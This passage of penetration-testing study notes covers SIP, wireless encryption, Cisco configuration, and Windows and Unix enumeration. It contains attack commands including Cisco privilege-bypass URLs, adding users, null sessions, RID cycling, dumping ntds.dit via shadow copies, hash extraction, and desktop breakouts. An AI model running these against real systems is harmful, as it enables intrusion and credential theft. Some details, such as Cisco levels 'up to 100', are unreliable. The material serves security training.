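    for line in ("SIP/2.0 401 Unauthorized", "SIP/2.0 404 Not Found", "SIP/2.0 200 OK"):
        print(line, "->", classify_register_response(line))
    print("cracked:", crack_register(CAPTURED, ["1234", "0000", "201", "5544"]))
```

Four-digit extension passwords, which are common on PBXs, fall in milliseconds; the only real defences are TLS for signalling and passwords that are not derived from the extension.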
There are additional methods that can be used, for example INFO and SUBSCRIBE (published in other RFCs):
 SUBSCRIBE – Initiates a subscription for notification of events from a notifier.
 PRACK - Provisional acknowledgement.
 NOTIFY - Inform a subscriber of notifications of a new event.
 PUBLISH - Publish an event to a notification server.
 INFO - Send mid-session information that does not modify the session state.
 REFER - Ask recipient to issue SIP request for the purpose of call transfer.
 MESSAGE - Transport text messages.
 UPDATE - Modifies the state of a session without changing the state of the dialog.
The Session Initiation Protocol (SIP) is a communications protocol for signalling and controlling multimedia
communication sessions in applications of Internet telephony for voice and video calls, in private IP telephone
systems, as well as in instant messaging over Internet Protocol (IP) networks.
SIP is only involved for the signalling operations of a media communication session and is primarily used to set up
and terminate voice or video calls. Voice and video media streams are typically carried between the terminals using
the Real-time Transport Protocol (RTP) or Secure Real-time Transport Protocol (SRTP).
Under SIP, each resource, such as a user agent or a voicemail box, is identified by a Uniform Resource Identifier
(URI).
D6 - Wireless
Enumeration and fingerprinting of devices running Wireless (802.11) services.
 airodump-ng wlan0mon - will show surrounding wireless networks (BSSID, channel, encryption, ESSID) and the
clients associated with them. The interface must be in monitor mode (put there with airmon-ng).
 airodump-ng wlan0mon -w jdw-1 :: Will write captures with the prefix jdw-1 (jdw-1-01.cap, jdw-1-01.csv, ...);
the CSV can then be opened in a visualiser for easier analysis and the .cap holds any captured handshakes.
 Wireshark on the monitor-mode interface to view the packets themselves.
Knowledge of various options for encryption and authentication, and the relative methods of each.
WEP - Wired Equivalent Privacy (WEP) is the original 802.11 pre-shared key mechanism, utilizing RC4 encryption.
WEP is broken: the key can be recovered by an eavesdropper who sees enough traffic (minutes, with packet
injection and aircrack-ng).
WEP used a 64-bit or 128-bit key (really 40 or 104 bits of secret plus a 24-bit IV that is sent in the clear and
repeats quickly) that must be manually entered on wireless access points and devices and does not change.
Weaknesses are:
 Passive attacks to decrypt traffic based on statistical analysis (the FMS and PTW attacks on RC4 weak IVs).
 Active attacks to inject new traffic from unauthorized mobile stations, based on known plaintext (the CRC-32
integrity check is linear, so a modified packet's checksum can be fixed up).
 Active attacks to decrypt traffic, based on tricking the access point.
 Dictionary-building attack that, after analysis of about a day's worth of traffic, allows real-time automated
decryption of all traffic.
WEP's major weakness is its use of a static key with a tiny IV space, from which the key can be derived by traffic
analysis.
WPA – WPA (Wi-Fi Protected Access). WPA was originally meant as a wrapper to WEP to tackle the insecurities
caused by WEP, so that it could run on existing WEP hardware. It was meant as a quick fix until WPA2 became
available. Against WPA-PSK the practical attack is an offline dictionary attack on a captured 4-way handshake;
TKIP itself also has packet-forgery weaknesses (Beck-Tews), and routers with WPS enabled expose a PIN that can be
brute-forced regardless of passphrase strength.
There are two modes in which it can operate:
1. WPA-PSK: Preshared key (password) – also known as Shared authentication, or WPA personal
2. WPA-Enterprise (802.1x authentication (for Wired and Wi-Fi networks) – Supplicant, Authenticator,
Authentication Server) This requires a RADIUS server and can be combined with an Extensible
Authentication Protocol (also known as EAP authentication which establishes a secure tunnel between
participants involved in an authentication exchange).
WPA personal implements the Temporal Key Integrity Protocol (TKIP) with RC4 encryption. TKIP employs per-packet
key mixing, meaning that it derives a fresh 128-bit RC4 key for each packet from the temporal key and a 48-bit
sequence counter, and thus prevents the weak-IV attacks that compromised WEP.
WPA also includes a Message Integrity Check, called Michael, which is designed to prevent an attacker from altering
and resending data packets. This replaces the cyclic redundancy check (CRC) that was used by the WEP standard.
Michael is much stronger than a CRC, but it is a deliberately lightweight 64-bit MIC (so that it runs on WEP
hardware) and not as strong as the CCMP integrity protection used in WPA2.
WPA2 - The most important improvement of WPA2 over WPA was the use of the Advanced Encryption Standard (AES)
for encryption: WPA2 does not use TKIP but CCMP (AES in counter mode with CBC-MAC) for cryptographic
encapsulation, with 128-bit AES keys derived from the 256-bit Pairwise Master Key (PMK). In WPA2-Personal the PMK
is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), which is why a captured 4-way handshake can be attacked
offline with a dictionary and why passphrase length is what matters.
At this time the main vulnerabilities of a WPA2 system are a weak passphrase (offline dictionary attack on a
captured handshake or PMKID), key reinstallation (KRACK, 2017, a client-side implementation flaw since patched),
WPS PIN brute force where WPS is enabled, and an attacker who already holds the PSK and can therefore derive other
clients' keys after capturing their handshakes and decrypt their traffic (there is no per-client forward secrecy
in WPA2-Personal).
Enterprise Authentication
802.1X PNAC – Port based Network Access Control can use EAP, as can Wi-Fi.
By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access
point helps a wireless client device and the RADIUS server to perform mutual authentication. WPA2 and WPA use
five different EAP types as authentication mechanisms. There are currently about 40 different methods defined; the
EAP choice depends on the level of security you need and your server/client specs. Although there are more than
ten EAP types, the popular ones are:
 LEAP: A proprietary method by Cisco (Lightweight Extensible Authentication Protocol) was used early on. It is
based on Microsoft CHAP, which means that the information that's being sent between these devices has a
few security shortcomings.
 PEAP: (Protected Extensible Authentication Protocol) was created by Cisco, Microsoft and RSA Security to
come up with a way to encrypt all communication.
 EAP-TLS: Unlike most TLS implementations of HTTPS, such as on the World Wide Web, the majority of
implementations of EAP-TLS require client-side X.509 certificates. The requirement for a client-side
certificate gives EAP-TLS its authentication strength and illustrates the classic convenience vs. security
trade-off.
 EAP-MD5: Offers minimal security; (MD5 hash) does not support key generation, which makes it unsuitable
for use with dynamic WEP, or WPA/WPA2 enterprise. EAP-MD5 differs from other EAP methods in that it
only provides authentication of the EAP peer to the EAP server but not mutual authentication. By not
providing EAP server authentication, this EAP method is vulnerable to man-in-the-middle attacks. EAP-MD5
support was first included in Windows 2000 and deprecated in Windows Vista.
 EAP Protected One-Time Password (EAP-POTP) - uses one-time password (OTP) tokens, such as a handheld
hardware device or a hardware or software module running on a personal computer, to generate
authentication keys. EAP-POTP can be used to provide unilateral or mutual authentication and key material
in protocols that use EAP. The EAP-POTP method provides two-factor user authentication, meaning that a
user needs both physical access to a token and knowledge of a personal identification number (PIN) to
perform authentication.
 EAP Pre-Shared Key (EAP-PSK) - Mutual authentication and session key derivation using a pre-shared key
(PSK). It provides a protected communication channel, when mutual authentication is successful, for both
parties to communicate and is designed for authentication over insecure networks such as IEEE 802.11.
 EAP Password (EAP-PWD) - Uses a shared password for authentication. The password may be a low-entropy
one and may be drawn from some set of possible passwords, like a dictionary, which is available to an
attacker. The underlying key exchange is resistant to active attack, passive attack, and dictionary attack.
 EAP Tunnelled Transport Layer Security (EAP-TTLS) - an EAP protocol that extends TLS. Windows started
EAP-TTLS support with Windows 8. The client can, but does not have to, be authenticated to the server via a
CA-signed PKI certificate. This greatly simplifies the setup procedure since a certificate is not needed on
every client (as compared with EAP-TLS). After the server is securely authenticated to the client via its CA
certificate, and optionally the client to the server, the server can then use the established secure
connection ("tunnel") to authenticate the client. It can use an existing and widely deployed authentication
protocol and infrastructure, incorporating legacy password mechanisms and authentication databases, while
the secure tunnel provides protection from eavesdropping and man-in-the-middle attack. Note that the user's
name is never transmitted in unencrypted clear text, improving privacy.
D7 - Configuration Analysis
Analysing configuration files from the following types of Cisco equipment:
Cisco HTTP Arbitrary Access vulnerability
Cisco devices have a number of privilege levels; these start at 0 (User EXEC) and go up to 100, although mostly
only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode.
By referring to these levels within the URL of the target device, an attacker could pass commands to the router and
have them execute in Privilege EXEC mode.
Web browse to the Cisco device: http://<IP>
Click cancel to the logon box and enter the following address:
http://<IP>/level/99/exec/show/config
You may have to scroll through all of the levels from 16-99 for this to work. To raise the logging level to only log
emergencies:
http://<IP>/level/99/configure/logging/trap/emergencies/CR
To add a rule to allow Telnet:
http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR
Interpreting the configuration of other manufacturers’ devices.
https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/07_basic_commands_tasks.htm
Appendix E: Microsoft Windows Security Assessment
NetBIOS
LOC-SRV 135/TCP - RPC client-server communication (DCE endpoint)
LOC-SRV 135/UDP - RPC client-server communication (DCE endpoint)
NETBIOS-NS 137/UDP - Name Service / NetBIOS Name Table (NBT): local NetBIOS browser, naming and lookup services
NETBIOS-DGM 138/UDP - Datagram Service used for local NetBIOS browser, naming and lookup services
NETBIOS-SSN 139/TCP - Session Service, used for authentication and file sharing
MICROSOFT-DS 445/TCP - CIFS server
MICROSOFT-DS 445/UDP
Windows RPC
Epdump is a MS command line tool to query RPC endpoints. Rpcdump is another useful tool.
Epdump 192.168.0.1
The response will show NetBIOS names and IP addresses. It will also show, for example, that the Messenger Service is
accessible through UDP port 1028, along with named pipes (\PIPE\ntsvcs). Named pipes are accessible through SMB
upon authenticating.
E1 - Domain Reconnaissance
Identifying domains/workgroups and domain membership within the target network.
echo %userdomain% (or the value listed by SET) will show domain membership
NetBIOS Name Server – Accessible through UDP 137. It provides NetBIOS Name Table (NBT).
nbtstat -n
nbtstat -A remote-ip
net user <userName> /domain - It will list both Local and Global groups that user belongs to.
Adding user: net user username password /add
net config workstation - list domain info
Master Browser
NBTSTAT -A x.x.x.x (remote) or NBTSTAT -n (local)
__MSBROWSE__.<01> GROUP Registered # Master Browser
SUPERMAN <00> UNIQUE Registered # Hostname
ASIA <00> GROUP Registered # Domain/Workgroup
...or UNIQUE <1B> (Domain Master Browser), <1D> (Master Browser)
Also, can use: browstat getmaster \device\netbt_el59x1 domainname
NetBIOS Datagram Service – Accessible through UDP 138.
NetBIOS Session Service – Accessible through TCP 139 – Facilitates Authentication. Can use a null session –
net use \\targetIP\IPC$ "" /user:""
Tools: Enum – By default attempts a null session but can specify username and password. Winfo is a similar tool.
Both of these "forward lookup" tools can be restricted if the admin sets RestrictAnonymous = 1
RID Cycling
GetAcct performs reverse lookup for Windows Server RID values to get user account names, known as RID cycling.
NT4 can only set RestrictAnonymous = 1 so is susceptible to RID cycling. Windows 2000 Server has extended
anonymous protection and can set RestrictAnonymous = 2, so is not susceptible?
By default, Windows 2000 and 2003 servers allow anonymous (null session) access to SMB. If null sessions are not
permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces.
Rpcclient, part of the Unix Samba package, can be used to interact with RPC endpoints across SMB and named
pipes. A useful rpcclient command is lookupsids, which allows SID-to-username lookups (RID cycling).
Below it is used against a remote system to perform RID cycling: it first looks up the full SID value of the chris
account using the WEBSERV account, and then increments the RID value (1001 to 1007) to enumerate other user
accounts through the LSARPC interface:
rpcclient -I 192.168.0.25 -U=chris%password WEBSERV
rpcclient> lookupnames chris
chris S-1-xxxxx-1003 (User: 1)
rpcclient> lookupsids S-1-xxxxx-1001
Every Windows user, computer, or service account has a unique alphanumeric identifier called the security ID (SID).
Example SID: S-1-5-21-4064627337-2434140041-2375368561-1036
1036 is the RID – The RID uniquely identifies a security principal relative to the local or domain security authority
that issued the SID. Any group or user that the Windows OS doesn't create has a RID of 1000 or greater by default.
S identifies the following string as a SID. The sub-authority values between the S-1-5-21 prefix and the final RID
(4064627337-2434140041-2375368561 in the example) are the domain or local computer identifier. If you create a user
object, delete it, then recreate it with the same name, the new object won't have the same SID as the original object.
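As an added worked example (not from the original notes), the following Python parses a SID in the textual form shown above, separates the issuing domain identifier from the RID, and classifies the RID the way the notes describe; the well-known RIDs 512 and 513 (Domain Admins, Domain Users) are standard values not listed on this page, and the sample SIDs are constructed.

```python
# Added example, not from the original notes: parser for textual Windows SIDs
# (S-<revision>-<authority>-<sub-authorities...>-<RID>). Sample SIDs are constructed.
from dataclasses import dataclass
from typing import Tuple

# RIDs Windows assigns itself; anything the OS did not create is 1000 or greater.
# 512/513 (Domain Admins / Domain Users) are standard values added here.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    512: "Domain Admins",
    513: "Domain Users",
}


@dataclass(frozen=True)
class Sid:
    revision: int
    authority: int
    sub_authorities: Tuple[int, ...]  # the trailing value is the RID

    @property
    def rid(self) -> int:
        """Relative identifier: the last sub-authority (1036 in the notes' example)."""
        return self.sub_authorities[-1]

    @property
    def domain_sid(self) -> str:
        """SID of the issuing domain or local machine, i.e. everything except the RID."""
        head = [str(self.revision), str(self.authority)]
        head += [str(s) for s in self.sub_authorities[:-1]]
        return "S-" + "-".join(head)

    def with_rid(self, rid: int) -> str:
        """Textual SID of another principal issued by the same authority."""
        return "%s-%d" % (self.domain_sid, rid)


def parse_sid(text: str) -> Sid:
    """Parse 'S-1-5-21-...-1036'; placeholders such as 'S-1-xxxxx-1003' are rejected."""
    parts = text.strip().split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError("not a SID: %r" % text)
    if not all(p.isdigit() for p in parts[1:]):
        raise ValueError("non-numeric SID component in %r" % text)
    nums = [int(p) for p in parts[1:]]
    if nums[0] != 1:
        raise ValueError("unsupported SID revision %d" % nums[0])
    return Sid(revision=nums[0], authority=nums[1], sub_authorities=tuple(nums[2:]))


def describe_rid(rid: int) -> str:
    """Classify a RID as the notes do: well-known, built-in/reserved, or user-created."""
    if rid in WELL_KNOWN_RIDS:
        return "%s (well-known RID %d)" % (WELL_KNOWN_RIDS[rid], rid)
    if rid >= 1000:
        return "user-created principal (RID %d >= 1000)" % rid
    return "built-in or reserved principal (RID %d < 1000)" % rid


def same_issuer(sid_a: str, sid_b: str) -> bool:
    """True when both SIDs were issued by the same domain or local machine."""
    return parse_sid(sid_a).domain_sid == parse_sid(sid_b).domain_sid


if __name__ == "__main__":
    example = "S-1-5-21-4064627337-2434140041-2375368561-1036"  # SID from the notes above
    sid = parse_sid(example)
    print("issuer:", sid.domain_sid)
    print("RID %d -> %s" % (sid.rid, describe_rid(sid.rid)))
    print("Domain Admins of this issuer:", sid.with_rid(512))
```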
Through a process of RID cycling it is possible to enumerate all domain users from a Windows 2003 domain
controller. This method works on Windows 2003 domain controllers because the SID of the "Domain Users" group can
be enumerated; this was done to ensure a good level of compatibility, and the same technique will not work on
Windows 2008 domain controllers. With this information it is then possible to iterate through the RIDs to enumerate
users. The following is an example of automated username enumeration using GetAcct from a Windows 2003
domain controller:
LSA brute forcing can be done anonymously against Windows 2000 and requires a guest account or better on other
systems.
This isn't a brute-force technique in the common sense, however: it's a brute-forcing of users' RIDs. A user's RID is a
value (generally 500, 501, or 1000+) that uniquely identifies a user on a domain or system. An LSA function is
exposed which lets us convert the RID (say, 1000) to the username (say, "Ron").
Identifying key servers within the target domains.
Grab list of domain controllers from last step for each domain.
nslookup -type=SRV _ldap._tcp.
Zone transfer _msdcs zone and ad zones.
Identifying and analysing internal browse lists.
net view - may show all computers in the network
net view /domain - shows the number of domains and workgroups in the environment
net view /ALL /Domain:demo.com
View the users and groups of an AD Security group
net group /domain TheGroupName
net localgroup /domain
net localgroup administrators
net localgroup administrators /domain
net group /domain
net group "Domain Admins" /domain
Identifying and analysing accessible SMB shares
net share
SYSVOL - Sysvol is an important component of Active Directory. The Sysvol folder is shared on an NTFS volume on
all the domain controllers in a particular domain. Sysvol is used to deliver the policy and logon scripts to domain
members.
By default, SYSVOL includes two folders:
1. Policies - (%SystemRoot%\Sysvol\Sysvol\domain_name\Policies) - The "shell" for the GPO is a folder,
which is stored under the Policies folder (GPT).
2. Scripts (shared with the name NETLOGON) - (%SystemRoot%\Sysvol\Sysvol\domain_name\Scripts)
By default, the SYSVOL share allows read-only access to the Everyone user context. However, the NTFS permissions
for the SYSVOL folder (C:\Windows\SYSVOL by default) restrict read-only access to the Authenticated Users context.
So, by default, only domain authenticated users will be granted read privileges to the SYSVOL share.
E2 - User Enumeration
Identifying user accounts on target systems and domains using NetBIOS, SNMP and LDAP.
https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0
net user Shows local users
net user /domain Shows list of users in domain
net user "account name" /domain Shows user details
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.4.1.77.1.2.25
ldapsearch -H ldap://test.local -b DC=test,DC=local "(objectclass=user)"
(use "(objectclass=computer)" instead if enumerating computers)
wmic useraccount get
Enumerate all domain user accounts.
auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS= E > domain_users.txt
SNMP: Metasploit
auxiliary/scanner/snmp/snmp_enumusers
E3 - Active Directory
Active Directory Roles (Global Catalogue, Master Browser, FSMO)
Because an Active Directory role is not bound to a single DC, it is referred to as a Flexible Single Master Operation
(FSMO) role. Currently in Windows there are five FSMO roles:
 Schema master
 Domain naming master
 RID master
 PDC emulator
 Infrastructure master
Flexible Single Master Operation Roles (FSMO) - removes the need for a PDC (primary domain controller) and many
BDCs (backup domain controllers) by spreading tasks among controllers.
The global catalogue is a distributed data repository that contains a searchable, partial representation of every
object in every domain in a multidomain Active Directory Domain Services (AD DS) forest. The global catalogue is
stored on domain controllers that have been designated as global catalogue servers and is distributed through multi-
master replication. Searches that are directed to the global catalog are faster because they do not involve referrals
to different domain controllers.
The Master Browser is responsible for the browse list within its respective subnet and portion of the domain on its
subnet. The Domain Master Browser is used to collect information from each of the Master Browsers via the
NetServerEnum API call. Once collected the list is merged with the Domain Master Browsers list for its own subnet.
This merged list forms the enterprise wide browse list for the domain. This merged list is then distributed to the
Master Browsers in each subnet so that the enterprise list can be available to computers requesting services.
Reliance of AD on DNS and LDAP
Active Directory (AD) uses DNS as its locator service to support the various types of services that AD offers, such as
Global Catalog (GC), Kerberos, and Lightweight Directory Access Protocol (LDAP).
When you install Active Directory and the DNS Server role on your first Domain Controller in the domain, it
automatically creates two forward lookup zones for your domain. If your AD domain is ad.example.com, you'll have a
zone for ad.example.com and the subdomain _msdcs.ad.example.com.
The _msdcs zone holds all of the records that your client machines need to find domain controllers. It includes records
to locate AD sites and records for the different FSMO role holders. It hosts only DNS SRV (service) records that are
registered by Microsoft-based services:
Global Catalog Service - _gc._tcp
Domain Controllers - _ldap._tcp # domain controllers identified by LDAP
Kerberos Authentication - _kerberos._tcp
The ad.example.com zone holds all of the records for your client computers, member servers, and the A records for
your Domain Controllers. Why is this zone important? So that your workstations and servers can communicate with
each other on the network. If this zone didn't exist, you could probably log in, but you wouldn't be able to do much
else except browse the Internet.
The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs on a layer above the
TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories.
You can query LDAP anonymously using ldp.exe. The ldapsearch tool is a simple Unix-based alternative.
ldapsearch -h 192.168.0.65
An attacker can launch a brute-force, password guessing attack to compromise user accounts. The Unix bf_ldap tool
is useful for this purpose. Windows uses an LDAP service called Global Catalog (GC) on TCP port 3268. GC stores a
logical representation of all the users, servers and devices within a Windows AD infrastructure. You can use the
ldp.exe and ldapsearch utilities (along with a valid username and password) to enumerate users, servers, policies and
other information. Just remember to point to port 3268 instead of 389.
Group Policy (Local Security Policy)
net accounts - list account policy
E4 - Windows Passwords
Password policies (complexity, lockout policies)
Kerberos Golden Ticket
 If you have domain admin/local admin access on an Active Directory forest/domain, you can manipulate
Kerberos tickets to get unauthorized access.
 In AD, accounts sign in with a username and password, and get back a Kerberos ticket that contains their
authentication token.
 An attacker needs to log into the DC and dump the password hash for the KRBTGT account to create the
Golden Ticket.
 The Golden Ticket is the Kerberos authentication token for the KRBTGT account, a special hidden account
with the job of encrypting all the authentication tokens for the DC. That Golden Ticket can then use a pass-
the-hash technique to log into any account.
Account Brute Forcing
Hash Storage (merits of LANMAN, NTLMv1 / v2)
 LM hash (also known as LanMan hash or LAN Manager hash) is a compromised password hashing function
that was the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows
NT used to store user passwords.
 The LM hashing algorithm is very old and is considered very insecure. Windows stored both LM and NTLM
hashes by default until Windows Vista/Server 2008, from which point only NTLM hashes were stored (along
with the empty LM hash AAD3B435B51404EEAAD3B435B51404EE).
 LANMAN Hash:
 Convert all lower case to UPPER CASE
 Pad password to 14 characters with NULL characters
 Split the password to two 7-character chunks
 Create a DES key from each 7-character chunk (two keys in total)
 DES encrypt the string "KGS!@#$%" with each of these two keys
 Concatenate the two DES encrypted strings. This is the LM hash.
That 16-byte string is the LANMAN hash that's stored in the SAM file.
1. Passwords are not case sensitive. All passwords are converted into uppercase before generating the
hash value, so password, PassWord, PaSsWoRd, PASSword and similar combinations all hash the same as
PASSWORD.
2. Password characters are also limited to a subset of 95 characters in the 256-byte ASCII character set.
3. Password length is limited to a maximum of 14 characters.
4. A 14-character password is broken into 7+7 characters and the hash is calculated for the two halves
separately.
5. If the password is 7 characters or less, the second half of the hash is always the same constant value
(0xAAD3B435B51404EE). Therefore a password of 7 characters or fewer can be identified by inspection,
without using tools.
6. The hash value is sent to network servers without salting, making it susceptible to man-in-the-middle
attacks such as replaying the hash, and also allowing rainbow tables to be constructed.
 NTLM (v1) (NT Hash) is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN).
The algorithm: MD4(UTF-16-LE(password))
 NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in
Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks, and
adding the ability for a server to authenticate to the client.
 NTLMv2 is the challenge-response protocol for performing MS Windows password authentication over the
networks. It's used any time a password needs to be provided to a Windows or Samba server and the client
is not part of the Windows Active Directory domain.
 The deeper problem is that NTLMv1-2 provide absolutely no protection against credential forwarding/relay
or reflection attacks. This means that an active attacker (such as a man-in-the-middle) is sometimes able to
redirect the login of the legitimate user to authenticate his own session.
 NTLM remains vulnerable to the pass the hash attack, which is a variant on the reflection attack which was
addressed by Microsoft security update MS08-068. For example, Metasploit can be used in many cases to
obtain credentials from one machine which can be used to gain control of another machine.
 NTLM Hash: Generating the NTLM hash is far easier than a LANMAN hash. It is simply an MD4() of the
password (in Unicode).
 Challenge/response - Once the LANMAN and NTLM hashes have been calculated, they can't just be put on
the wire. That would be vulnerable to any number of attacks, the most obvious being replay.
Offline Password Analysis (rainbow tables / hash brute forcing)
 Distinction between the SAM database on a Windows system and the NTDS database on the Domain Controller.
To further protect the password hashes these are encrypted using a key stored in the SYSTEM
(C:\Windows\System32\config\SYSTEM) registry hive. This second encryption step is why, in order to
perform a password dump for auditing, a copy of both files is needed. Hashes (for AD) are stored at
c:\windows\NTDS\ntds.dit, but the file is locked due to it being accessed all the time.
 %systemRoot%\system32\Config
 %systemRoot%\repair (pre Windows XP)
 %systemRoot%\NTDS\ntds.dit (Active Directory)
 From registry (requires System Privileges)
 Windows Server 2008-2016 – Use ntdsutil
 Windows Server 2003 - vssadmin create shadow /for=C:
vssadmin list shadows - check whether any shadow copies already exist
vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM
vssadmin delete shadows /shadow=[GUID] - delete the shadow copy
 Cracking the Hashes – Tools: John the Ripper; Cain & Abel is a Windows-based tool with a host of useful
features, including a password cracker. It's normally a good idea to break very weak passwords with a simple
dictionary attack and a short (5-character) brute force attack first, then let the rainbow tables pick up the
rest.
E5 - Windows Vulnerabilities
Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public
domain.
MS17-010 - nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 <ip_netblock>
Knowledge of local windows privilege escalation vulnerabilities and techniques.
LLMNR, NBT-NS and DNS
Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for
local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use
Multicast DNS (mDNS) to discover systems within a network.
Attackers can exploit these UDP messages and direct users to malicious services. The example below illustrates the
capture of NTLMv2 hashes, which are saved to disk and can then be cracked with John the Ripper.
Knowledge of common post exploitation activities
 obtain password hashes, both from the local SAM and cached credentials
 obtaining locally-stored clear-text passwords
 crack password hashes
Pwdump3 can remotely authenticate (against ADMIN$ share) and then extract user password hashes from the
Windows 2000 host (?):
Pwdump3 192.168.189.1 hashes.txt Administrator
Please enter the password >secret
Two tools can be used to crack Windows passwords hashes downloaded by Pwdump3:
 Cain & Abel – supports rainbow table cracking of NTLM hashes.
 John the Ripper – performs basic dictionary-based attacks.
 Reversion to previous state
E6 - Windows Patch Management Strategies
 check patch levels – QFE (Quick Fix Engineering): wmic qfe
Derive list of missing security patches – MBSA. Knowledge of common windows patch management strategies:
SMS - Microsoft Systems Management Server (SMS) 2003 provides a feature-rich management and servicing
solution. You can use SMS 2003 or System Center Configuration Manager 2007 (ConfigMgr) to manage networked
Windows Embedded Standard-based devices alongside Windows desktop, Windows Server, and other Windows
Mobile systems.
SUS - Microsoft SUS is a free patch management tool provided by Microsoft to help network administrators deploy
security patches more easily. In simple terms, Microsoft SUS is a version of Windows Update that you can run on
your network. Instead of each workstation having to connect to the Internet to update Windows, each workstation
connects to the Microsoft SUS Server instead and updates from there.
WSUS - Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest
Microsoft product updates.
MBSA - Microsoft Baseline Security Analyzer (MBSA) - The MBSA can help you stay on top of regular network
auditing tasks by scanning both local and remote Microsoft systems for common security misconfigurations. It can
also identify missing security updates and service packs available through the various Microsoft Update
technologies, helping to ensure all machines are patched correctly.
E7 - Desktop Lockdown
Knowledge and understanding of techniques to break out of a locked down Windows desktop / Citrix environment.
 Dialog Boxes – Notepad, File > Save As; Print – will give access to drives which can be used as a pivot to create
new files (batch, shortcuts), open new Windows Explorer instances, exploring context menus (Open File
Location).
 Help Menus – Similar to above, but some may have click here to open Command Prompt, or use URL link to
open up IE from which you can pivot (see below)
 Environment Variables / Bypassing Path Restrictions – Use a variable as opposed to a location, i.e.
%SYSTEMROOT% as opposed to c:\windows\system32
 IE - File protocol handlers (about:, file:, mailto:), UNC paths \\127.0.0.1\c$\Windows\System32. Address Bar,
Menus, Right Click in site, Set homepage to cmd.exe, F12 Developer Tools
 Getting Command Prompt – Is Run available? Try Windows+R. Browse to it, right click and open; drag and
drop a file with an invalid extension onto the executable; set a custom app to view source, so set to cmd.exe;
Import Certificate (abusing Dialog Boxes)
 Microsoft Office applications by using the CTRL+Click option. file:///c:/Windows/System32/cmd.exe. It is
trivial to use msfencode/msfpayload to generate VBA code that will create a reverse shell / Meterpreter
shell on the host. VBA can be used to open CMD.
 MS SQL – xp_cmdshell
 Task Manager – File > New Task (Run)
 Task Scheduler, MSPAINT, FTP – lcd/!dir
 Rundll32 - There is a vast array of commands that can be run via Rundll32.
Date and Time Properties: RunDll32.exe shell32.dll,Control_RunDLL timedate.cpl
 Shortcuts - Standard shortcuts exist which may be useful. WINDOWS+E – Launch Windows Explorer,
WINDOWS+R – Run, F3 – Search, CTRL+O – Open File, CTRL+S – Save, CTRL+N – New
 Batch Files and Scripts - Batch files such as .BAT and .CMD can be an alternative for executing system
commands when an interactive shell isn’t permitted. Whilst .BAT files can be disabled, the lesser known
.CMD equivalent can sometimes be allowed. Windows Script Hosts (WSH): Can create a .vbs file to launch a
CMD shell.
 ICA Files – Modify ICA file so that InitialProgram=cmd.exe
 Citrix – Email, Clipboard. Cached connection information may be available in local application data stores.
Look for the “ICAClient” directory, which is usually found within the %APPDATA% folder. Using “dir /s
ICAClient” from a command line will also work.
 By copying another user’s ICAClient contents into your own folder, it may be possible to hijack their stored
connections.
 Citrix Shortcuts - SHIFT+F1 – Displays Windows Task List.
 As per privilege escalation - Binary Planting, DLL Hijacking
Privilege escalation techniques.
 Depends on from what and to what – example from admin to system? Admin to Domain Admin, User to
Admin
 Clear Text Credentials in Files – Install and Config files – unattended.txt, sysprep.inf, sysprep.xml, vnc.ini,
cached FTP, findstr /si password *.txt *.xml *.ini
 Passwords in Registry – Autologin, SNMP, Putty
 Directory Permissions – Incorrect Permissions often in Program Files for processes running as System
 Default permissions on newly created files.
 Autoruns – Sysinternals tool will highlight start-up executable locations – these files can be trojaned, unless
the binary cannot be overwritten directly.
 DLLs – However, data such as a DLL can still be added to that directory, which may get executed as part of
the binary (it looks in the same folder first, then system32). Process Monitor to trace.
 Scheduled Tasks – AT command - Only admin can view, but normal user can view what tasks are running.
 Services – Orphaned Installs, hijack them – Autoruns tools from Sysinternals.
 Token Impersonation
 Impersonate Named Pipe
 Internet Explorer Java Escalation
E8 - Exchange
Knowledge of common attack vectors for Microsoft Exchange Server.
 OWA
 Choose Your Certificates Carefully
 Utilize the Power of Edge Transport Server
 Keep Administrative Access Internal
E9 - Common Windows Applications
Knowledge of significant vulnerabilities in common windows applications for which there is public exploit code
available.
MS17-010 – Eternal Blue
Appendix F: Unix Security Assessment
F1 - User enumeration
Discovery of valid usernames from network services commonly running by default:
 Rusers – RPC service endpoint that listens on dynamic ports. If TCP/UDP 111 open the rpcinfo client can check
for presence of rusersd:
rpcinfo -p 192.168.0.10
program vers proto port service
1100002 3 tcp 33180 rusersd
Once found, use rusers to retrieve the list of logged in users.
$ rusers -l 192.168.0.50
 Rwho – UDP 513 – rwho 192.168.189.120 – will list current logged in users.
 SMTP – Password brute forcing. Valid user account details can be enumerated by issuing the SMTP VRFY, EXPN
or RCPT TO commands:
telnet host 25
HELO world
VRFY test
VRFY chris
EXPN asks the server for the membership of a mailing list. A VRFY request asks the server to verify an address.
The point of a RCPT request is to add one address to the list of envelope recipient addresses, from which I
suppose you could check for bounces and deduce live accounts.
 Finger – TCP 79. Connect direct or via Finger command. Solaris 8 and below, information leak:
finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10 or finger 'a b c d e f g h'@target.com
Finger works by querying entries in the passwd files, i.e. GECOS fields. Finger can also be used to query "plan" files.
Plan files can be created by users to inform others of their current activity, humour or anything else that the user
may wish to share.
finger user@192.168.0.10
Finger redirection: finger @192.168.0.10@217.34.17.200
